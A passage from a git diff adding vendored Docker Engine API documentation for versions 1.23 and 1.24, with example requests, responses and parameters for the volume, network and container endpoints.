"some-other-value" + } + } + +**Status codes**: + +- **200** - no error +- **404** - no such volume +- **500** - server error + +#### Remove a volume + +`DELETE /volumes/(name)` + +Instruct the driver to remove the volume (`name`). + +**Example request**: + + DELETE /v1.23/volumes/tardis HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** - no error +- **404** - no such volume or volume driver +- **409** - volume is in use and cannot be removed +- **500** - server error + +### 3.5 Networks + +#### List networks + +`GET /networks` + +**Example request**: + + GET /v1.23/networks?filters={"type":{"custom":true}} HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +[ + { + "Name": "bridge", + "Id": "f2de39df4171b0dc801e8002d1d999b77256983dfc63041c0f34030aa3977566", + "Scope": "local", + "Driver": "bridge", + "EnableIPv6": false, + "Internal": false, + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.17.0.0/16" + } + ] + }, + "Containers": { + "39b69226f9d79f5634485fb236a23b2fe4e96a0a94128390a7fbbcc167065867": { + "EndpointID": "ed2419a97c1d9954d05b46e462e7002ea552f216e9b136b80a7db8d98b442eda", + "MacAddress": "02:42:ac:11:00:02", + "IPv4Address": "172.17.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + } + }, + { + "Name": "none", + "Id": "e086a3893b05ab69242d3c44e49483a3bbbd3a26b46baa8f61ab797c1088d794", + "Scope": "local", + "Driver": "null", + "EnableIPv6": false, + "Internal": false, + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + }, + { + "Name": "host", + "Id": "13e871235c677f196c4e1ecebb9dc733b9b2d2ab589e30c539efeda84a24215e", + "Scope": "local", + "Driver": "host", + "EnableIPv6": false, + "Internal": false, + "IPAM": { + "Driver": "default", + "Config": [] + }, + "Containers": {}, + "Options": {} + } +] +``` + +**Query parameters**: + +- **filters** - JSON encoded network list filter. The filter value is one of: + - `id=` Matches all or part of a network id. + - `name=` Matches all or part of a network name. + - `type=["custom"|"builtin"]` Filters networks by type. The `custom` keyword returns all user-defined networks. + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Inspect network + +`GET /networks/` + +**Example request**: + + GET /v1.23/networks/7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99 HTTP/1.1 + +**Example response**: + +``` +HTTP/1.1 200 OK +Content-Type: application/json + +{ + "Name": "net01", + "Id": "7d86d31b1478e7cca9ebed7e73aa0fdeec46c5ca29497431d3007d2d9e15ed99", + "Scope": "local", + "Driver": "bridge", + "EnableIPv6": false, + "IPAM": { + "Driver": "default", + "Config": [ + { + "Subnet": "172.19.0.0/16", + "Gateway": "172.19.0.1/16" + } + ], + "Options": { + "foo": "bar" + } + }, + "Internal": false, + "Containers": { + "19a4d5d687db25203351ed79d478946f861258f018fe384f229f2efa4b23513c": { + "Name": "test", + "EndpointID": "628cadb8bcb92de107b2a1e516cbffe463e321f548feb37697cce00ad694f21a", + "MacAddress": "02:42:ac:13:00:02", + "IPv4Address": "172.19.0.2/16", + "IPv6Address": "" + } + }, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + }, + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + } +} +``` + +**Status codes**: + +- **200** - no error +- **404** - network not found + +#### Create a network + +`POST /networks/create` + +Create a network + +**Example request**: + +``` +POST /v1.23/networks/create HTTP/1.1 +Content-Type: application/json + +{ + "Name":"isolated_nw", + "CheckDuplicate":true, + "Driver":"bridge", + "EnableIPv6": true, + "IPAM":{ + "Driver": "default", + "Config":[ + { + "Subnet":"172.20.0.0/16", + "IPRange":"172.20.10.0/24", + "Gateway":"172.20.10.11" + }, + { + "Subnet":"2001:db8:abcd::/64", + "Gateway":"2001:db8:abcd::1011" + } + ], + "Options": { + "foo": "bar" + } + }, + "Internal":true, + "Options": { + "com.docker.network.bridge.default_bridge": "true", + "com.docker.network.bridge.enable_icc": "true", + "com.docker.network.bridge.enable_ip_masquerade": "true", + "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", + "com.docker.network.bridge.name": "docker0", + "com.docker.network.driver.mtu": "1500" + }, + "Labels": { + "com.example.some-label": "some-value", + "com.example.some-other-label": "some-other-value" + } +} +``` + +**Example response**: + +``` +HTTP/1.1 201 Created +Content-Type: application/json + +{ + "Id": "22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30", + "Warning": "" +} +``` + +**Status codes**: + +- **201** - no error +- **404** - plugin not found +- **500** - server error + +**JSON parameters**: + +- **Name** - The new network's name. this is a mandatory field +- **CheckDuplicate** - Requests daemon to check for networks with same name. Defaults to `false` +- **Driver** - Name of the network driver plugin to use. Defaults to `bridge` driver +- **Internal** - Restrict external access to the network +- **IPAM** - Optional custom IP scheme for the network + - **Driver** - Name of the IPAM driver to use. Defaults to `default` driver + - **Config** - List of IPAM configuration options, specified as a map: + `{"Subnet": , "IPRange": , "Gateway": , "AuxAddress": }` + - **Options** - Driver-specific options, specified as a map: `{"option":"value" [,"option2":"value2"]}` +- **EnableIPv6** - Enable IPv6 on the network +- **Options** - Network specific options to be used by the drivers +- **Labels** - Labels to set on the network, specified as a map: `{"key":"value" [,"key2":"value2"]}` + +#### Connect a container to a network + +`POST /networks/(id)/connect` + +Connect a container to a network + +**Example request**: + +``` +POST /v1.23/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/connect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4", + "EndpointConfig": { + "IPAMConfig": { + "IPv4Address":"172.24.56.89", + "IPv6Address":"2001:db8::5689" + } + } +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - network or container is not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **container** - container-id/name to be connected to the network + +#### Disconnect a container from a network + +`POST /networks/(id)/disconnect` + +Disconnect a container from a network + +**Example request**: + +``` +POST /v1.23/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30/disconnect HTTP/1.1 +Content-Type: application/json + +{ + "Container":"3613f73ba0e4", + "Force":false +} +``` + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** - no error +- **404** - network or container not found +- **500** - Internal Server Error + +**JSON parameters**: + +- **Container** - container-id/name to be disconnected from a network +- **Force** - Force the container to disconnect from a network + +#### Remove a network + +`DELETE /networks/(id)` + +Instruct the driver to remove the network (`id`). + +**Example request**: + + DELETE /v1.23/networks/22be93d5babb089c5aab8dbc369042fad48ff791584ca2da2100db837a1c7c30 HTTP/1.1 + +**Example response**: + + HTTP/1.1 204 No Content + +**Status codes**: + +- **204** - no error +- **404** - no such network +- **500** - server error + +## 3. Going further + +### 3.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. + +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 3.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + + +### 3.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all, +default or blank means CORS disabled + + $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar" diff --git a/vendor/github.com/docker/docker/docs/api/v1.24.md b/vendor/github.com/docker/docker/docs/api/v1.24.md new file mode 100644 index 0000000000..0cf4e2afab --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/v1.24.md @@ -0,0 +1,5316 @@ +--- +title: "Engine API v1.24" +description: "API Documentation for Docker" +keywords: "API, Docker, rcli, REST, documentation" +redirect_from: +- /engine/reference/api/docker_remote_api_v1.24/ +- /reference/api/docker_remote_api_v1.24/ +--- + + + +## 1. Brief introduction + + - The daemon listens on `unix:///var/run/docker.sock` but you can + [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket). + - The API tends to be REST. However, for some complex commands, like `attach` + or `pull`, the HTTP connection is hijacked to transport `stdout`, + `stdin` and `stderr`. + +## 2. Errors + +The Engine API uses standard HTTP status codes to indicate the success or failure of the API call. The body of the response will be JSON in the following format: + + { + "message": "page not found" + } + +The status codes that are returned for each endpoint are specified in the endpoint documentation below. + +## 3. Endpoints + +### 3.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.24/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 1", + "Created": 1367854155, + "State": "Exited", + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "2cdc4edb1ded3631c81f57966563e5c8525b81121bb3706a9a9a3ae102711f3f", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:02" + } + } + }, + "Mounts": [ + { + "Name": "fac362...80535", + "Source": "/data", + "Destination": "/data", + "Driver": "local", + "Mode": "ro,Z", + "RW": false, + "Propagation": "" + } + ] + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 222222", + "Created": 1367854155, + "State": "Exited", + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "88eaed7b37b38c2a3f0c4bc796494fdf51b270c2d22656412a2ca5d559a64d7a", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.8", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:08" + } + } + }, + "Mounts": [] + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "State": "Exited", + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "8b27c041c30326d59cd6e6f510d4f8d1d570a228466f956edf7815508f78e30d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.6", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:06" + } + } + }, + "Mounts": [] + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "State": "Exited", + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0, + "HostConfig": { + "NetworkMode": "default" + }, + "NetworkSettings": { + "Networks": { + "bridge": { + "IPAMConfig": null, + "Links": null, + "Aliases": null, + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "d91c7b2f0644403d7ef3095985ea0e2370325cd2332ff3a3225c4247328e66e9", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.5", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:11:00:05" + } + } + }, + "Mounts": [] + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. + Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`created`|`restarting`|`running`|`paused`|`exited`|`dead`) + - `label=key` or `label="key=value"` of a container label + - `isolation=`(`default`|`process`|`hyperv`) (Windows daemon only) + - `ancestor`=(`[:]`, `` or ``) + - `before`=(`` or ``) + - `since`=(`` or ``) + - `volume`=(`` or ``) + - `network`=(`` or ``) + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.24/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": "", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "StopSignal": "SIGTERM", + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Tmpfs": { "/run": "rw,noexec,nosuid,size=65536k" }, + "Links": ["redis3:redis"], + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "CpuPercent": 80, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + "IOMaximumBandwidth": 0, + "IOMaximumIOps": 0, + "BlkioWeight": 300, + "BlkioWeightDevice": [{}], + "BlkioDeviceReadBps": [{}], + "BlkioDeviceReadIOps": [{}], + "BlkioDeviceWriteBps": [{}], + "BlkioDeviceWriteIOps": [{}], + "MemorySwappiness": 60, + "OomKillDisable": false, + "OomScoreAdj": 500, + "PidMode": "", + "PidsLimit": -1, + "PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsOptions": [""], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "GroupAdd": ["newgroup"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Sysctls": { "net.ipv4.ip_forward": "1" }, + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "StorageOpt": {}, + "CgroupParent": "", + "VolumeDriver": "", + "ShmSize": 67108864 + }, + "NetworkingConfig": { + "EndpointsConfig": { + "isolated_nw" : { + "IPAMConfig": { + "IPv4Address":"172.20.30.33", + "IPv6Address":"2001:db8:abcd::3033", + "LinkLocalIPs":["169.254.34.68", "fe80::3468"] + }, + "Links":["container_1", "container_2"], + "Aliases":["server_x", "server_y"] + } + } + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id":"e90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. This must be a valid RFC 1123 hostname. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. +- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. +- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- **Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. +- **WorkingDir** - A string specifying the working directory for commands to + run in. +- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **StopSignal** - Signal to stop a container as a string or unsigned integer. `SIGTERM` by default. +- **HostConfig** + - **Binds** – A list of volume bindings for this container. Each volume binding is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. Both `host-src`, and `container-dest` must be + an _absolute_ path. + + `volume-name:container-dest` to bind-mount a volume managed by a + volume driver into the container. `container-dest` must be an + _absolute_ path. + + `volume-name:container-dest:ro` to mount the volume read-only + inside the container. `container-dest` must be an _absolute_ path. + - **Tmpfs** – A map of container directories which should be replaced by tmpfs mounts, and their corresponding + mount options. A JSON object in the form `{ "/run": "rw,noexec,nosuid,size=65536k" }`. + - **Links** - A list of links for the container. Each link entry should be + in the form of `container_name:alias`. + - **Memory** - Memory limit in bytes. + - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap. + You must use this with `memory` and make the swap value larger than `memory`. + - **MemoryReservation** - Memory soft limit in bytes. + - **KernelMemory** - Kernel memory limit in bytes. + - **CpuPercent** - An integer value containing the usable percentage of the available CPUs. (Windows daemon only) + - **CpuShares** - An integer value containing the container's CPU Shares + (ie. the relative weight vs other containers). + - **CpuPeriod** - The length of a CPU period in microseconds. + - **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period. + - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use. + - **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + - **IOMaximumBandwidth** - Maximum IO absolute rate in terms of IOps. + - **IOMaximumIOps** - Maximum IO absolute rate in terms of bytes per second. + - **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000. + - **BlkioWeightDevice** - Block IO weight (relative device weight) in the form of: `"BlkioWeightDevice": [{"Path": "device_path", "Weight": weight}]` + - **BlkioDeviceReadBps** - Limit read rate (bytes per second) from a device in the form of: `"BlkioDeviceReadBps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceReadBps": [{"Path": "/dev/sda", "Rate": "1024"}]"` + - **BlkioDeviceWriteBps** - Limit write rate (bytes per second) to a device in the form of: `"BlkioDeviceWriteBps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceWriteBps": [{"Path": "/dev/sda", "Rate": "1024"}]"` + - **BlkioDeviceReadIOps** - Limit read rate (IO per second) from a device in the form of: `"BlkioDeviceReadIOps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceReadIOps": [{"Path": "/dev/sda", "Rate": "1000"}]` + - **BlkioDeviceWiiteIOps** - Limit write rate (IO per second) to a device in the form of: `"BlkioDeviceWriteIOps": [{"Path": "device_path", "Rate": rate}]`, for example: + `"BlkioDeviceWriteIOps": [{"Path": "/dev/sda", "Rate": "1000"}]` + - **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. + - **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not. + - **OomScoreAdj** - An integer value containing the score given to the container in order to tune OOM killer preferences. + - **PidMode** - Set the PID (Process) Namespace mode for the container; + `"container:"`: joins another container's PID namespace + `"host"`: use the host's PID namespace inside the container + - **PidsLimit** - Tune a container's pids limit. Set -1 for unlimited. + - **PortBindings** - A map of exposed container ports and the host port they + should map to. A JSON object in the form + `{ /: [{ "HostPort": "" }] }` + Take note that `port` is specified as a string and not an integer value. + - **PublishAllPorts** - Allocates a random host port for all of a container's + exposed ports. Specified as a boolean value. + - **Privileged** - Gives the container full access to the host. Specified as + a boolean value. + - **ReadonlyRootfs** - Mount the container's root filesystem as read only. + Specified as a boolean value. + - **Dns** - A list of DNS servers for the container to use. + - **DnsOptions** - A list of DNS options + - **DnsSearch** - A list of DNS search domains + - **ExtraHosts** - A list of hostnames/IP mappings to add to the + container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + - **VolumesFrom** - A list of volumes to inherit from another container. + Specified in the form `[:]` + - **CapAdd** - A list of kernel capabilities to add to the container. + - **Capdrop** - A list of kernel capabilities to drop from the container. + - **GroupAdd** - A list of additional groups that the container process will run as + - **RestartPolicy** – The behavior to apply when the container exits. The + value is an object with a `Name` property of either `"always"` to + always restart, `"unless-stopped"` to restart always except when + user has manually stopped the container or `"on-failure"` to restart only when the container + exit code is non-zero. If `on-failure` is used, `MaximumRetryCount` + controls the number of times to retry before giving up. + The default is not to restart. (optional) + An ever increasing delay (double the previous delay, starting at 100mS) + is added before each restart to prevent flooding the server. + - **UsernsMode** - Sets the usernamespace mode for the container when usernamespace remapping option is enabled. + supported values are: `host`. + - **NetworkMode** - Sets the networking mode for the container. Supported + standard values are: `bridge`, `host`, `none`, and `container:`. Any other value is taken + as a custom network's name to which this container should connect to. + - **Devices** - A list of devices to add to the container specified as a JSON object in the + form + `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}` + - **Ulimits** - A list of ulimits to set in the container, specified as + `{ "Name": , "Soft": , "Hard": }`, for example: + `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }` + - **Sysctls** - A list of kernel parameters (sysctls) to set in the container, specified as + `{ : }`, for example: + `{ "net.ipv4.ip_forward": "1" }` + - **SecurityOpt**: A list of string values to customize labels for MLS + systems, such as SELinux. + - **StorageOpt**: Storage driver options per container. Options can be passed in the form + `{"size":"120G"}` + - **LogConfig** - Log configuration for the container, specified as a JSON object in the form + `{ "Type": "", "Config": {"key1": "val1"}}`. + Available types: `json-file`, `syslog`, `journald`, `gelf`, `fluentd`, `awslogs`, `splunk`, `etwlogs`, `none`. + `json-file` logging driver. + - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist. + - **VolumeDriver** - Driver that this container users to mount volumes. + - **ShmSize** - Size of `/dev/shm` in bytes. The size must be greater than 0. If omitted the system uses 64MB. + +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. + +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.24/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "StopSignal": "SIGTERM" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "IOMaximumBandwidth": 0, + "IOMaximumIOps": 0, + "BlkioWeight": 0, + "BlkioWeightDevice": [{}], + "BlkioDeviceReadBps": [{}], + "BlkioDeviceWriteBps": [{}], + "BlkioDeviceReadIOps": [{}], + "BlkioDeviceWriteIOps": [{}], + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpusetMems": "", + "CpuPercent": 80, + "CpuShares": 0, + "CpuPeriod": 100000, + "Devices": [], + "Dns": null, + "DnsOptions": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "OomKillDisable": false, + "OomScoreAdj": 500, + "NetworkMode": "bridge", + "PidMode": "", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": "on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "Sysctls": { + "net.ipv4.ip_forward": "1" + }, + "StorageOpt": null, + "VolumesFrom": null, + "Ulimits": [{}], + "VolumeDriver": "", + "ShmSize": 67108864 + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "SandboxID": "", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": null, + "SandboxKey": "", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "", + "Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "", + "IPPrefixLen": 0, + "IPv6Gateway": "", + "MacAddress": "", + "Networks": { + "bridge": { + "NetworkID": "7ea29fc1412292a2d7bba362f9253545fecdfa8ce9a6e37dd10ba8bee7129812", + "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:12:00:02" + } + } + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { + "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Dead": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z", + "Status": "running" + }, + "Mounts": [ + { + "Name": "fac362...80535", + "Source": "/data", + "Destination": "/data", + "Driver": "local", + "Mode": "ro,Z", + "RW": false, + "Propagation": "" + } + ] + } + +**Example request, with size information**: + + GET /v1.24/containers/4fa6e0f0c678/json?size=1 HTTP/1.1 + +**Example response, with size information**: + + HTTP/1.1 200 OK + Content-Type: 